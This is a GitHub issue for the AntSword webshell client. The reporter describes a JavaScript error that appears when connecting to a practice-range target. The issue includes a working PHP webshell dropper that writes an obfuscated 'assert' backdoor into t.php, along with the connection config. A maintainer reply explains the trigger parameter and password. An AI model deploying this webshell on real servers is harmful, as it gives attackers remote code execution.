### ISSUE TITLE
A javascript error occured in the main process

### ISSUE THREAD

**Issue by MaxLuan** [AntSwordProject/antSword#270]
- [x] 我确定这是蚁剑本身的一个 Bug，我并不是在询问如何使用蚁剑
- [x] 我确定已经将蚁剑升级至[软件发布页面](https://github.com/AntSwordProject/AntSword/releases)中的**最新版**
- [x] 我已经阅读过蚁剑的开发文档，并且尝试过自己通过Google等方式解决问题
- [ ] 这是一个新功能的建议
- [x] 我查阅了文档没找到解决方案，所以来询问如何使用蚁剑

---

## 报告 Bug

- [ ] 我使用的操作系统是 ***macOS*** 10+
- [ ] 我使用的操作系统是 ***Debian/Ubuntu*** GNU/Linux
- [ ] 我使用的操作系统是 ***Fedora*** GNU/Linux
- [ ] 我使用的操作系统是 ***Arch*** GNU/Linux
- [ ] 我使用的操作系统是 ***Other*** GNU/Linux
- [x] 我使用的操作系统是 ***Windows*** 10+

---

- [ ] 我使用的是 32 位操作系统
- [x] 我使用的是 64 位操作系统

### Bug 详细描述

软件可以正常打开。

添加数据后，点击测试链接，弹出报错。
![image](https://user-images.githubusercontent.com/3802741/104400037-d7d86e80-558c-11eb-8ce9-bd12d0a3d0a4.png)

选择保存，双击添加好的数据，弹出报错。
![image](https://user-images.githubusercontent.com/3802741/104400062-e757b780-558c-11eb-891c-6e2065740b0b.png)

---

## 新功能建议

- [ ] 我确定我所提的新功能不在[待做事项](https://github.com/AntSwordProject/AntSword/blob/master/CHANGELOG.md#待做事项)内，也不在issue列表
- [ ] 我确定我所提出的新功能是为了方便在网站管理，而不是用于非法用途

### 新功能描述

---

### shell 连接 Bug

1. 服务端操作系统
墨者靶场，操作系统未知。
2. 服务端shell代码
```
<?php if (!empty($_GET[1]) && $_GET[1] == 'GET.fPZ87') {
    $_ = @fopen('t.php', 'a');
    echo "test";
    @fwrite($_, "<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));@\$_(\$_POST[1]);?>");
    @fclose($_);
}
```

3. 服务端环境配置
未知

4. 客户端连接配置
```
{"category":"default","url":"http://219.153.49.228:49181/include/t.php?1=ilovey","pwd":"1","note":"","type":"php","ip":"219.153.49.228","addr":"重庆市 电信","encode":"UTF8","encoder":"base64","decoder":"default","httpConf":{"body":{},"headers":{}},"otherConf":{"add-MassData":0,"chunk-step-byte-max":"3","chunk-step-byte-min":"2","command-path":"","custom-datatag-tage":"","custom-datatag-tags":"","filemanager-cache":1,"ignore-https":1,"random-Prefix":"2","request-timeout":"10000","terminal-cache":0,"upload-fragment":"500","use-chunk":0,"use-custom-datatag":0,"use-multipart":0,"use-random-variable":0},"ctime":1610505439320,"utime":1610505692571,"_id":"XTDSnNw587eRAqYT"}
```

**Comment by Medicean** [comment]
注意看生成后的 t.php 的触发条件

t.php?2=ilovey

pwd: 1
